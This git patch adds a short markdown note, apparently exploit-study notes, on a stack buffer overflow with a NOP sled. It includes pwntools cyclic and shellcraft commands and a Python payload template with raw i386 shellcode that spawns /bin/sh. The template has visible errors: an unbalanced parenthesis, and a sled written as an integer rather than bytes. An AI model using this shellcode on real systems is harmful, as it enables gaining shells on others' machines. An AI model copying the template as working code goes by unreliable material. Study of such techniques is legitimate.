From 4f00e34b9a6245ea7448c8bd3bc288c0da309987 Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Fri, 27 Aug 2021 23:38:42 +0200
Subject: [PATCH] BO addition

---
 .../buffer_overflow/docs/cut_stack_in_half.md | 32 +++++++++++++++++++
 .../docs/{radare2.md => ret_address_reuse.md} |  0
 2 files changed, 32 insertions(+)
 create mode 100644 exploit/buffer_overflow/docs/cut_stack_in_half.md
 rename exploit/buffer_overflow/docs/{radare2.md => ret_address_reuse.md} (100%)

diff --git a/exploit/buffer_overflow/docs/cut_stack_in_half.md b/exploit/buffer_overflow/docs/cut_stack_in_half.md
new file mode 100644
index 0000000..3255b7d
--- /dev/null
+++ b/exploit/buffer_overflow/docs/cut_stack_in_half.md
@@ -0,0 +1,32 @@
+# Cut Stack in Half + NOPsled
+
+* Stack has to be executable
+* `cylic buffer` + `eip` content is `esp` + half of the stack + NOPsled + shellcode
+* **ASLR has to be off** or `eip` content address pointing into the sled needs to be fuzzed hard
+
+## shellcraft
+* for example
+```sh
+shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s
+```
+
+##  Usage
+* measure `eip` offset via 
+    ```sh
+    cyclic <number>
+    ```
+    * Check eip content via gdb
+    ```sh
+    cyclic -l <eipContent>
+    ```
+* Example code
+```python
+from pwn import *
+
+padding(cyclic(cyclic_find(<eipContent>))
+eip = p32(<esp> + some offset into stack)
+sled = 90 * 100
+shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"
+payload = padding + eip + sled + shellcode
+```
+
diff --git a/exploit/buffer_overflow/docs/radare2.md b/exploit/buffer_overflow/docs/ret_address_reuse.md
similarity index 100%
rename from exploit/buffer_overflow/docs/radare2.md
rename to exploit/buffer_overflow/docs/ret_address_reuse.md